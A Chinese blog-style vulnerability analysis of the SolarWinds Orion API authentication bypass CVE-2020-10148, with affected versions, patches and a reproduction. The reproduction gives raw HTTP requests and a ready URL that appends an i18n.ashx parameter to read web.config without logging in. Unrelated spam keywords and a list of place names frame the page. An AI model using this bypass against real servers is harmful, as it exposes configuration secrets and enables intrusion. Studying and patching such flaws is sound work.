91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的

發布時間:2021-12-28 20:10:08 來源:億速云 閱讀:167 作者:柒染 欄目:安全技術

這篇文章給大家介紹SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

SolarWinds Orion API 遠程代碼執行漏洞

(CVE-2020-10148)

一、漏洞概況

SolarWinds Orion API 嵌入在 Orion Core 中,被用于與所有 SolarWinds Orion Platform 產品進行接口。通過在URI請求的Request.PathInfo 部分中包含特定參數,可以繞過 API 身份驗證,這可能允許攻擊者執行未經身份驗證的 API 命令。如果攻擊者將WebResource.adx,scriptResource.adx,i18n.ashx 或 Skipi18n 的 PathInfo 參數附加到對 SolarWinds Orion 服務器的請求,SolarWinds 可能會設置 SkipAuthorization 標志,該標志可能允許處理API請求無需身份驗證。

攻擊者可利用該漏洞遠程執行任意代碼,有專業黑客組織利用該漏洞投遞代號為'SUPERNOVA'的惡意程序。

二、漏洞影響范圍

影響版本:

SolarWinds Orion 2020.2.1 HF 2 及 2019.4 HF 6之前的版本

安全版本:

SolarWinds Orion 2019.4 HF 6(2020年12月14日發布)

SolarWinds Orion 2020.2.1 HF 2(發布于2020年12月15日)

SolarWinds Orion 2019.2 SUPERNOVA補丁(2020年12月23日發布)

SolarWinds Orion 2018.4 SUPERNOVA補丁(2020年12月23日發布)

SolarWinds Orion 2018.2 SUPERNOVA補丁(2020年12月23日發布)

三、漏洞復現

訪問/Orion/invalid.aspx.js 路徑,截取請求頭中Location中data獲取

Location:/Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.L

SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的

GET/Orion/invalid.aspx.jsHTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/css,*/*;q=0.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://127.0.0.1/Orion/Login.aspx?ReturnUrl=%2fCookie: ASP.NET_SessionId=p5yxzzumyllsfprttbkexo4u; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE

response

HTTP/1.1404Not FoundCache-Control: no-cachePragma: no-cacheExpires: -1Location: /Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.LServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Same-Domain: 1X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockDate: Wed, 30 Dec 2020 01:55:43 GMTConnection: closeContent-Length: 0

將 .i18n.ashx?l=en-US&v=43005.14.L攜帶到下個訪問路徑,從而繞過身份認證。這里訪問的是 web.config文件。

SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的

直接訪問也行:

http://127.0.0.1/web.config.i18n.ashx?l=en-us&v=43005.14.L

SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的

關于SolarWinds Orion API 遠程代碼執行漏洞CVE-2020-10148的分析是什么樣的就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

金秀| 彩票| 阜阳市| 印江| 景泰县| 巍山| 纳雍县| 六枝特区| 沂南县| 通化县| 南安市| 柘荣县| 额敏县| 巴青县| 罗山县| 怀安县| 垫江县| 康乐县| 兴城市| 遂溪县| 怀化市| 霸州市| 锦屏县| 图们市| 永年县| 北宁市| 舟山市| 延长县| 深水埗区| 略阳县| 康马县| 华亭县| 隆化县| 通海县| 云梦县| 伊春市| 荃湾区| 西畴县| 苏州市| 阿克陶县| 枝江市|